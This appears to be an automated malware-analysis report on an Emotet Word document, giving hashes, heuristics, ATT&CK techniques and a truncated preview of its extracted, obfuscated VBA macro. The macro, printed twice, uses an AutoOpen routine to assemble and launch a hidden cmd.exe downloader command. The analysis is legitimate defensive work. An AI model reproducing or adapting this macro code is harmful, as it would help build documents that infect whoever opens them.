Emotet Office (OLE) malware analysis — malicious · 9eb4bba67420675d

MALICIOUS

Office (OLE)

91.2 KB Created: 2018-08-02 20:18:00 Authoring application: Microsoft Office Word First seen: 2018-08-26

MD5: b60868200051d30950498b26b2d363ef SHA-1: 084b4d6c3dd872df159e9680635b259fe52c2236 SHA-256: 9eb4bba67420675dfd10fdd1049e93444d99ddeecc9e10ebbf32686b5ea17290

142 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, a common Emotet technique. The macro attempts to execute a command-line payload using cmd.exe, constructing a complex command string from concatenated parts. This indicates the document is a downloader for a second-stage payload.

Heuristics 5

ClamAV: Doc.Downloader.Emotet-6884163-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6884163-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5263 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5263 bytes
SHA-256: `48faf61a1457b539bc4943f55fd448c0c52b0e0d3518343685704c8e1176b1d3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "NtTbcDhbbitsfz" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next TypeName CDate(RriLS) TypeName ChrB(wTdqMR / 61661 + 46241 / WhoVG) TypeName Rnd(DrPJjK + rIJCUO / LYMliK / NBbHQb) TypeName 53 Shell@ CStr("c") + CStr("m") + zEIdDvlWQJUJ + dhjLzjQwap + qqaKFzzRA + zvLjhwLQ + LDtnTrunazS + SiLUhiAzlwL + XjqiwEaNEP, 549412026 - 549412026 TypeName 71862376 TypeName Cos(qpnCSj / piqUIt) TypeName Log(MzjwP) End Sub Attribute VB_Name = "uQifLaQOTdp" Function qqaKFzzRA() On Error Resume Next TypeName Sgn(408) TypeName ChrW(wTAuAl) LnzjN = "d /" + "V:O/C" + CStr(Chr(YYHNkwWHl + bvVLKbOLo + 34 + FizpaatNR + NBufcQzSt)) + "set " + "kv" + "Ld=rNNiwJ" + "cBZtQz" + "QZMp" TypeName 450 TypeName Round(UKoYFR) TypeName CStr(99788 + 90111) UQlDtCZ = "WkBhVICtME" + "G" + "DBPmXA" + "hmWa" + "{ (jvuf/g" + "5xs" + "),=OFoe+" + "4ld7R$}" + "S'.@\;" + "y:qnb6-&&" + "for %U in" + " (1" TypeName Tan(WWpbjb) TypeName Round(sZJDp) FwMbdpiFj = "5,54,4" + ",5" + "5,0" + "," + "48,33," + "55,58,5" + "8,38" + ",62,3,17,6" + "1,51," TypeName CStr(OrSbo / 61807) TypeName 1 oLDYfUYlzD = "73,55,4," + "7" + "6,54,74,4" + "0,5" + "5,6,23,38" + ",2,55,2" TypeName Chr(QJniPW) TypeName Log(510220550) ZoGLzYp = "3,66,35" + "," + "55,7" + "4,22" + ",58,3,55,7" + "3,23,69" + ",62,5" + ",29,73,51," + "65,33,2" TypeName BkikMO TypeName ChrB(833) TypeName CBool(ZBYcc) TqjJI = "3,23,15,71" + "," + "44,44" + ",54,73,5" + "8,3,73," + "55,15," + "6,5" + "9,54," + "6,66,6" + ",54,34" + ",44,21,6" + "7,3" TypeName Sgn(puZLt) TypeName 2 TypeName 241688633 MFdcaA = "3,23," + "23," + "15,71" + ",44,4" + "4,0,54" TypeName Chr(640) TypeName CDate(9) DWkCW = ",70,36," + "58,0,55,7" + "3," + "23,36,58,4" + "8,48,59," + "6" + "6" + ",6,54,3" TypeName CDbl(LtjPiH) TypeName Log(ilXbOp) TypeName Oct(93) AYtjn = "4," + "44,22," + "75," + "67,33" + ",23,23,15," + "71,44,4" + "4," + "59," + "55,6,5" + "4" + ",0,48" + ",2" + "3,54,4" qqaKFzzRA = LnzjN + UQlDtCZ + FwMbdpiFj + oLDYfUYlzD + ZoGLzYp + TqjJI + MFdcaA + DWkCW + AYtjn TypeName CStr(tMMiw - 14274 + 69123 + NINBPY) TypeName Round(95) End Function Function zvLjhwLQ() On Error Resume Next TypeName Oct(wNKhlj + oUwZEo + richj + wVvAcK) TypeName Fix(4) TypeName Sqr(kAvNQ) KszOGqa = "3,4" + "3,66,6,54," + "34,44" + ",72,33," + "36," + "67,33,23" + ",2" + "3,15" + ",71" + ",44,44,55" + ",36,45,58" + ",55,75,66," TypeName 2774 TypeName CLng(zwnBLW) IwzudFI = "73,55" + "," + "23,44," + "59,72,72" + ",31,0,67" + ",3" + "3,23,23,15" + ",71,4" TypeName Hex(jXbDo - zHwtRT - 60108 * szaSJF) TypeName 3080 ZhdhPQnZ = "4," + "44,15," + "3" + "6" + ",0,23,76,2" + "3,3,34," + "55,74,42,4" + "8,3,73" + ",55,48,48," + "66,54,0,45" TypeName CStr(WzdQn) TypeName MwKAa uLGlNGlSDI = ",4" + "4,5,55,15," + "5,5" + "3,33,53,11" + ",65," + "66,64,15,5" + "8,3,23,3" + "9,65" + ",67,65" + ",49" + ",69,62,22," + "26," TypeName CByte(443) TypeName Rnd(20577 * DVSGiU * vCkDL + wSGLjr) mNmnSFHBb = "40,38,51,3" + "8,65,60" + ",57,4" + "6,65,6" + "9,62,5" + "2,3,11," + "51,62," + "55,73" TypeName FWUjS TypeName Sin(7537) TypeName 4 PQzpDAaz = ",41,71,2" + "3,55,34,1" + "5,56," + "65,68,65" + ",56,6" + "2,22,26," + "40,56,65,6" TypeName Sgn(23077 * aXswJs) TypeName 5679 qIQzXMLUFv = "6,55," + "47,55,6" + "5,69,4" + "3,54,0,5" + "5,36,6" + ",33," + "39," + "62,36,15" + ",74,38,3," + "73,38,6" TypeName Sgn(88278 * HzddY + 53809 + 84424) TypeName Sqr(URAVOh - JlOwz) TypeName Fix(9095) dzHnf = "2,5,2" + "9,73,49" + ",37,23," + "0" + ",70,3" + "7,62,3" + ",17,61,6" + "6,27,5" + "4,4,73,58" + ",54,36" + ",59," + "53,3,5" + "8,55" TypeName CDate(3) TypeName 36 TypeName Log(3518) PIzplczHsnw = ",3" + "9,62" + ",36,15,74," + "50,38," + ... (truncated)

SHA-256: 48faf61a1457b539bc4943f55fd448c0c52b0e0d3518343685704c8e1176b1d3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "NtTbcDhbbitsfz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TypeName CDate(RriLS)
   TypeName ChrB(wTdqMR / 61661 + 46241 / WhoVG)
   TypeName Rnd(DrPJjK + rIJCUO / LYMliK / NBbHQb)
   TypeName 53
Shell@ CStr("c") + CStr("m") + zEIdDvlWQJUJ + dhjLzjQwap + qqaKFzzRA + zvLjhwLQ + LDtnTrunazS + SiLUhiAzlwL + XjqiwEaNEP, 549412026 - 549412026
   TypeName 71862376
   TypeName Cos(qpnCSj / piqUIt)
   TypeName Log(MzjwP)
End Sub


Attribute VB_Name = "uQifLaQOTdp"
Function qqaKFzzRA()
On Error Resume Next
TypeName Sgn(408)
   TypeName ChrW(wTAuAl)
LnzjN = "d /" + "V:O/C" + CStr(Chr(YYHNkwWHl + bvVLKbOLo + 34 + FizpaatNR + NBufcQzSt)) + "set " + "kv" + "Ld=rNNiwJ" + "cBZtQz" + "QZMp"
TypeName 450
   TypeName Round(UKoYFR)
   TypeName CStr(99788 + 90111)
UQlDtCZ = "WkBhVICtME" + "G" + "DBPmXA" + "hmWa" + "{ (jvuf/g" + "5xs" + "),=OFoe+" + "4ld7R$}" + "S'.@\;" + "y:qnb6-&&" + "for %U in" + " (1"
TypeName Tan(WWpbjb)
   TypeName Round(sZJDp)
FwMbdpiFj = "5,54,4" + ",5" + "5,0" + "," + "48,33," + "55,58,5" + "8,38" + ",62,3,17,6" + "1,51,"
TypeName CStr(OrSbo / 61807)
   TypeName 1
oLDYfUYlzD = "73,55,4," + "7" + "6,54,74,4" + "0,5" + "5,6,23,38" + ",2,55,2"
TypeName Chr(QJniPW)
   TypeName Log(510220550)
ZoGLzYp = "3,66,35" + "," + "55,7" + "4,22" + ",58,3,55,7" + "3,23,69" + ",62,5" + ",29,73,51," + "65,33,2"
TypeName BkikMO
   TypeName ChrB(833)
   TypeName CBool(ZBYcc)
TqjJI = "3,23,15,71" + "," + "44,44" + ",54,73,5" + "8,3,73," + "55,15," + "6,5" + "9,54," + "6,66,6" + ",54,34" + ",44,21,6" + "7,3"
TypeName Sgn(puZLt)
   TypeName 2
   TypeName 241688633
MFdcaA = "3,23," + "23," + "15,71" + ",44,4" + "4,0,54"
TypeName Chr(640)
   TypeName CDate(9)
DWkCW = ",70,36," + "58,0,55,7" + "3," + "23,36,58,4" + "8,48,59," + "6" + "6" + ",6,54,3"
TypeName CDbl(LtjPiH)
   TypeName Log(ilXbOp)
   TypeName Oct(93)
AYtjn = "4," + "44,22," + "75," + "67,33" + ",23,23,15," + "71,44,4" + "4," + "59," + "55,6,5" + "4" + ",0,48" + ",2" + "3,54,4"
qqaKFzzRA = LnzjN + UQlDtCZ + FwMbdpiFj + oLDYfUYlzD + ZoGLzYp + TqjJI + MFdcaA + DWkCW + AYtjn
   TypeName CStr(tMMiw - 14274 + 69123 + NINBPY)
   TypeName Round(95)
End Function
Function zvLjhwLQ()
On Error Resume Next
TypeName Oct(wNKhlj + oUwZEo + richj + wVvAcK)
   TypeName Fix(4)
   TypeName Sqr(kAvNQ)
KszOGqa = "3,4" + "3,66,6,54," + "34,44" + ",72,33," + "36," + "67,33,23" + ",2" + "3,15" + ",71" + ",44,44,55" + ",36,45,58" + ",55,75,66,"
TypeName 2774
   TypeName CLng(zwnBLW)
IwzudFI = "73,55" + "," + "23,44," + "59,72,72" + ",31,0,67" + ",3" + "3,23,23,15" + ",71,4"
TypeName Hex(jXbDo - zHwtRT - 60108 * szaSJF)
   TypeName 3080
ZhdhPQnZ = "4," + "44,15," + "3" + "6" + ",0,23,76,2" + "3,3,34," + "55,74,42,4" + "8,3,73" + ",55,48,48," + "66,54,0,45"
TypeName CStr(WzdQn)
   TypeName MwKAa
uLGlNGlSDI = ",4" + "4,5,55,15," + "5,5" + "3,33,53,11" + ",65," + "66,64,15,5" + "8,3,23,3" + "9,65" + ",67,65" + ",49" + ",69,62,22," + "26,"
TypeName CByte(443)
   TypeName Rnd(20577 * DVSGiU * vCkDL + wSGLjr)
mNmnSFHBb = "40,38,51,3" + "8,65,60" + ",57,4" + "6,65,6" + "9,62,5" + "2,3,11," + "51,62," + "55,73"
TypeName FWUjS
   TypeName Sin(7537)
   TypeName 4
PQzpDAaz = ",41,71,2" + "3,55,34,1" + "5,56," + "65,68,65" + ",56,6" + "2,22,26," + "40,56,65,6"
TypeName Sgn(23077 * aXswJs)
   TypeName 5679
qIQzXMLUFv = "6,55," + "47,55,6" + "5,69,4" + "3,54,0,5" + "5,36,6" + ",33," + "39," + "62,36,15" + ",74,38,3," + "73,38,6"
TypeName Sgn(88278 * HzddY + 53809 + 84424)
   TypeName Sqr(URAVOh - JlOwz)
   TypeName Fix(9095)
dzHnf = "2,5,2" + "9,73,49" + ",37,23," + "0" + ",70,3" + "7,62,3" + ",17,61,6" + "6,27,5" + "4,4,73,58" + ",54,36" + ",59," + "53,3,5" + "8,55"
TypeName CDate(3)
   TypeName 36
   TypeName Log(3518)
PIzplczHsnw = ",3" + "9,62" + ",36,15,74," + "50,38," +
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.